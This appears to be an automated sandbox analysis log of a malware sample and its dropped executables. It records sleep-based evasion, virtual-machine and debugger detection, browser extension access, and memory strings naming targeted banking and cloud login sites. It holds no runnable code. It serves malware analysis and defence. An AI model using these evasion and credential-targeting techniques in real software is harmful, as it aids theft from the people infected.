Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9172	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8152	Thread sleep count: 59 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8152	Thread sleep time: -118059s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8148	Thread sleep count: 297 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8148	Thread sleep time: -594297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9192	Thread sleep count: 709 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9192	Thread sleep time: -1418709s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe TID: 6832	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2468	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe TID: 3288	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe TID: 3196	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe TID: 2000	Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe TID: 6188	Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe TID: 3304	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe TID: 2624	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe TID: 356	Thread sleep time: -270000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe TID: 5540	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe TID: 6496	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe TID: 6680	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe TID: 2696	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6604	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2816	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe TID: 5308	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5396	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8316	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe TID: 4428	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3720	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe TID: 2292	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1320	Thread sleep count: 3692 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1972	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe TID: 4112	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe TID: 612	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809

Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\DocumentsKECBGCGCGI.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C76EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6C76EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: deb333ea90.exe, 00000020.00000002.3673961826.000000000101B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 06d4af6f50.exe, 00000021.00000003.3780845655.0000000005E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: 06d4af6f50.exe, 0000001E.00000002.3897005303.00000000017D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}a
Source: powershell.exe, 00000018.00000002.3444259783.00000287D9968000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_`E
Source: file.exe, 00000000.00000002.2675026709.0000000001583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2675026709.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3795878434.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3719067775.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3430761096.0000000000683000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3721852753.0000000000680000.00000004.00000020.00020000.00000000.sdmp, deb333ea90.exe, 0000001B.00000002.3502627065.0000000001404000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000002.3897005303.000000000174B000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000002.3897005303.00000000017A9000.00000004.00000020.00020000.00000000.sdmp, deb333ea90.exe, 00000020.00000002.3673961826.000000000104A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 06d4af6f50.exe, 0000001A.00000002.3795878434.0000000000661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 06d4af6f50.exe, 0000001A.00000003.3773018531.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: deb333ea90.exe, 00000020.00000002.3673961826.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2675026709.000000000153E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareT
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: DocumentsKECBGCGCGI.exe, 00000013.00000003.2684330830.0000000000D8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: file.exe, file.exe, 00000000.00000002.2673685948.0000000001153000.00000040.00000001.01000000.00000003.sdmp, DocumentsKECBGCGCGI.exe, 00000013.00000000.2658870884.0000000000817000.00000080.00000001.01000000.0000000B.sdmp, DocumentsKECBGCGCGI.exe, 00000013.00000002.2763921270.0000000000818000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000014.00000002.2791110287.0000000000978000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000014.00000000.2731622417.0000000000977000.00000080.00000001.01000000.0000000E.sdmp, skotes.exe, 00000016.00000000.3215750886.0000000000977000.00000080.00000001.01000000.0000000E.sdmp, 06d4af6f50.exe, 0000001A.00000002.3801305503.000000000105E000.00000040.00000001.01000000.00000011.sdmp, 06d4af6f50.exe, 0000001A.00000002.3810729843.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3811419166.0000000005DD8000.00000040.00000800.00020000.00000000.sdmp, deb333ea90.exe, 0000001B.00000002.3501708466.0000000000A63000.00000040.00000001.01000000.00000013.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 06d4af6f50.exe, 0000001A.00000002.3795878434.000000000060E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: powershell.exe, 00000018.00000002.3448344863.00000287D9C38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yNOz
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: deb333ea90.exe, 0000001B.00000002.3502627065.00000000013D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 06d4af6f50.exe, 0000001E.00000003.3856764362.0000000005FFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: deb333ea90.exe, 0000001B.00000002.3502627065.00000000013FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW+
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: DocumentsKECBGCGCGI.exe, 00000013.00000003.2684330830.0000000000D8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\6
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\z
Source: DocumentsKECBGCGCGI.exe, 00000013.00000003.2722293067.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\w/$`
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: deb333ea90.exe, 00000020.00000002.3673961826.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware&Cj
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: powershell.exe, 00000018.00000002.3448344863.00000287D9C38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}evice\
Source: DocumentsKECBGCGCGI.exe, 00000013.00000000.2658870884.0000000000817000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 00000014.00000000.2731622417.0000000000977000.00000080.00000001.01000000.0000000E.sdmp, skotes.exe, 00000016.00000000.3215750886.0000000000977000.00000080.00000001.01000000.0000000E.sdmp, skotes.exe, 0000001D.00000000.3496689676.0000000000977000.00000080.00000001.01000000.0000000E.sdmp	Binary or memory string: a\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.2673685948.0000000001153000.00000040.00000001.01000000.00000003.sdmp, DocumentsKECBGCGCGI.exe, 00000013.00000002.2763921270.0000000000818000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000014.00000002.2791110287.0000000000978000.00000040.00000001.01000000.0000000E.sdmp, 06d4af6f50.exe, 0000001A.00000002.3801305503.000000000105E000.00000040.00000001.01000000.00000011.sdmp, 06d4af6f50.exe, 0000001A.00000002.3810729843.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3811419166.0000000005DD8000.00000040.00000800.00020000.00000000.sdmp, deb333ea90.exe, 0000001B.00000002.3501708466.0000000000A63000.00000040.00000001.01000000.00000013.sdmp, 06d4af6f50.exe, 0000001E.00000002.3906786674.00000000065C8000.00000040.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000002.3907932219.00000000069F1000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000002.3889790716.000000000105E000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Thread information set: HideFromDebugger
